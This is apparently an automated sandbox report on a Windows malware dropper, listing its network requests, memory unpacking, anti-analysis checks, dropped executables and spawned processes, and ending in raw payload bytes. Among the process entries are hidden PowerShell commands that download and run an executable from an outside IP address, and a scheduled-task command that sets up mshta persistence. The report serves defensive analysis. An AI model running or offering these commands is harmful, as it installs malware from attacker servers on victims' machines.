request	GET http://185.215.113.75/files/5666444957/tYrnx75.exe
request	GET http://185.215.113.75/files/1975996902/up7d8Ym.exe
request	GET http://185.215.113.75/files/7527271436/012Bdpb.exe
request	GET http://185.215.113.75/files/5643377291/7fOMOTQ.exe
request	GET http://185.215.113.75/files/6691015685/Bjkm5hE.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.43/Zu7JuNko/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 301 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73872000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031b0000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

skotes.exe tried to sleep 426 seconds, actually delayed analysis time by 426 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (4 events)

Time & API	Arguments	Status	Return
DeviceIoControl Feb. 11, 2025, 10:40 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x0000018c output_buffer:	1	1
DeviceIoControl Feb. 11, 2025, 10:40 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x0000018c output_buffer:	1	1
DeviceIoControl Feb. 11, 2025, 10:40 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x0000018c output_buffer:	1	1
DeviceIoControl Feb. 11, 2025, 10:40 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x0000018c output_buffer:	1	1

Creates executable files on the filesystem (10 events)

file	C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe
file	C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe
file	C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe
file	C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe
file	C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe
file	C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
file	C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe
file	C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe
file	C:\Users\test22\AppData\Local\Temp\764661\Macromedia.com
file	C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	"C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
cmdline	PowerShell -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
cmdline	C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
cmdline	mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta
cmdline	schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

A process created a hidden window (12 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 11, 2025, 10:39 a.m.	thread_identifier: 2832 thread_handle: 0x00000338 process_identifier: 2828 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000344	1	1
ShellExecuteExW Feb. 11, 2025, 10:39 a.m.	show_type: 0 filepath_r: PowerShell parameters: -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; filepath: PowerShell	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe	1	1
ShellExecuteExW Feb. 11, 2025, 10:40 a.m.	show_type: 0 filepath_r: cmd parameters: /c copy Turner Turner.cmd & Turner.cmd filepath: cmd	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (8 events)

Time & API	Arguments	Status	Return
Process32NextW Feb. 11, 2025, 10:40 a.m.	snapshot_handle: 0x00000138 process_name: taskhost.exe process_identifier: 2428	1	1
Process32NextW Feb. 11, 2025, 10:40 a.m.	snapshot_handle: 0x00000138 process_name: svchost.exe process_identifier: 2888	1	1
Process32NextW Feb. 11, 2025, 10:40 a.m.	snapshot_handle: 0x00000138 process_name: 13Z5sqy.exe process_identifier: 2792	1	1
Process32NextW Feb. 11, 2025, 10:40 a.m.	snapshot_handle: 0x00000138 process_name: tYrnx75.exe process_identifier: 3064	1	1
Process32NextW Feb. 11, 2025, 10:40 a.m.	snapshot_handle: 0x00000138 process_name: cmd.exe process_identifier: 2188	1	1
Process32NextW Feb. 11, 2025, 10:40 a.m.	snapshot_handle: 0x00000138 process_name: WmiPrvSE.exe process_identifier: 1512	1	1
Process32NextW Feb. 11, 2025, 10:40 a.m.	snapshot_handle: 0x00000138 process_name: Macromedia.com process_identifier: 1728	1	1
Process32NextW Feb. 11, 2025, 10:40 a.m.	snapshot_handle: 0x00000138 process_name: inject-x86.exe process_identifier: 1536	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Feb. 11, 2025, 10:39 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x031b0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Feb. 11, 2025, 10:39 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00014000', u'virtual_address': u'0x000d4000', u'entropy': 7.05117352361143, u'name': u'.rsrc', u'virtual_size': u'0x00013e48'}

entropy

7.05117352361

description

A section with a high entropy has been found

URL downloaded by powershell script (15 events)

Data received	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Feb 2025 01:44:09 GMT Content-Type: application/octet-stream Content-Length: 2121728 Last-Modified: Tue, 11 Feb 2025 01:06:14 GMT Connection: keep-alive ETag: "67aaa286-206000" Accept-Ranges: bytes MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $§»-IãÚCãÚCãÚC¸²@íÚC¸²FBÚC6·GñÚC6·@õÚC6·FÚC¸²G÷ÚC¸²BðÚCãÚB5ÚCx´JâÚCx´¼âÚCx´AâÚCRichãÚCPELVðfàê J@ÐJ @W kX´}Jd}J @à.rsrcX@À.idata @À 0*°@àwdedeidu°à0¢@àbobdrwdlJ: @à.taggant0 J"> @à
Data received	¬êÏ4Âgi;Hhº<ä~>Uã+a$ÆÚi3-~vñÅãÛÊ}\ÜT7ðëÔèSs=ã8ø×äþ¹LÀ3[>+?t\ÜTÆ)ÆkqþÛ;>,¸8÷ 8ìü½Q/³P</æ8oüq;Ëÿ:æÌiø8]W0t\W0t\W0t\ÝKíø¿Q¿¥µßÞpHàºh+ó8¹öµÁ'g{5ö&½Q'g@1¢ÇµSØ´På8Víø8+ã½U:þ+ã8Rº4+ã8ÏnÀ&.ãt\W0t\W0t\W0t\ÜTúðïäÜ°+ã8Û¹8"l´·Ô?+ã8¼ü³ä:ÿm+ã8²Ph(âë²Ph/®v$)§k´9Â:þ5+ã8±Üîy.D;®80Ôèßã8+æL}x/;W0t\W0t\Ý=hÕØ¿X¿Éµæ2)kóQÛãíRº+ã8ûóP¨å8oüæRÝKÕØ¿X¿Éµæ2)kóQÛãíRº+ã8Ïn0t\W0t\W0t\W0t\ÜTú¡ïäÜ°+ã8ÛgTÈ×+ÖìíÇÂ´·Ô?+ã8AKúót(ãµi®8<¤q×'ä8+\|Ç}R»+ã8Wìà:ÕØ¿X¿üµÂã+ÒØq×'ã8gE¼§³ì7;ÿm)ã8³Pó¼©+ã8(âë³Ph/®i$)§k´9Â:ñ5+ã8±ÜáyBC;®80zµóáQÍó-Ô3úgã´á/xNä9Ö/~Èü³Ü3}Ï}R¹D+ã8Æ³äÑ+xsä-~;n)Ôq×OÄ©Ô+dã¾g¿Å½^q`$þ¼Éµ29;ó{î²Ïúµ_´<Ôèßã8+ÙÏÆ÷aþ1PJå8L}xÇ~;W0t\W0t\W0t\W0t\ÜTúxïäÜ°+ã8ÛE,1íä TÛqÿeÏG8+ãPü¦å8Ôèßã8+µtÄ't\W0t\W0t\ÜTúXïäÜ°+ã8Û¹8"l´·Ô?+ã88>ki5yn;Wøî(ãµ×xxäèö ö<½p'eCã8ã~èm®%:igxl®ìæäzÃÛ·(ãqÖã8+f\|Rº,+ã8VíÌ8+ã·×/³P@¤å8oøµÜ?³+ã8ÀµtÄ'PÍÿç8]ÜTÃÝKx/¡;¬$Ï±åîy3½;®807ü·×/~tÀ3+U:}ãw\ÜT7ðí@÷Â;¦ø½P/\|= ó¼£+ã8èøµö%µ±LÚüî:Q}ÿi{k)$FæÎè¨â8£)ä8%kx¹D¨ã8Ñö¹D-Sk4ìà<Pæ:)ÓmHYhùPHæ»h+ó8¹ÊµÓ'g{5ö4³Ô'qúm®ìæÕïmØ¶På8Vã8+f\|R»<+ã8VÒü8+ãîZâÕ(ãµÔ#ÁiLÆ3¿3+~÷i®84U}éÅµRÆ_Ïiø8yÑ×=3/à+?t\W0t\W0t\ÜTúxïäÜ°+ã8ÛE,1íä TÛqÿeÏG8+ãµ3Ã+~÷eÏ}7+ã8ÈçRW0t\W0t\ÜT7üíÇáû)pþRúìäèVíø8+ãÞVíü8Rº4+ã8Víô8+ãPtå8¤ô½U:þÕ+ã8Rºô+ã8h1a»<¤ôµÔpæÁ¹DìÈíììSü®å8îÜÒÛ(ã½U:ýÉ+ã8R§ä+ã8h<a»<ìà²ÒÃÿioäîqÕÏä8+fu¬ãÏ'Hh»<ä~1Zã+n)PÒüÏûµ^´<ìüqgä8+ã8Rzx+ã8+ãqoä8+ã8Rz+ã8+ã³§Sä8Í;¾]+ã8+\|þÙ®ì=å/9Ð/~Ç¬ãÏ'Hh»<ä~1Zã+a$ÙÖi1~iÙøÙmåLz+?t\W0t\W0t\W0t\ÜTú8ïäÜ°+ã8ÛµíÇÂE,1íä 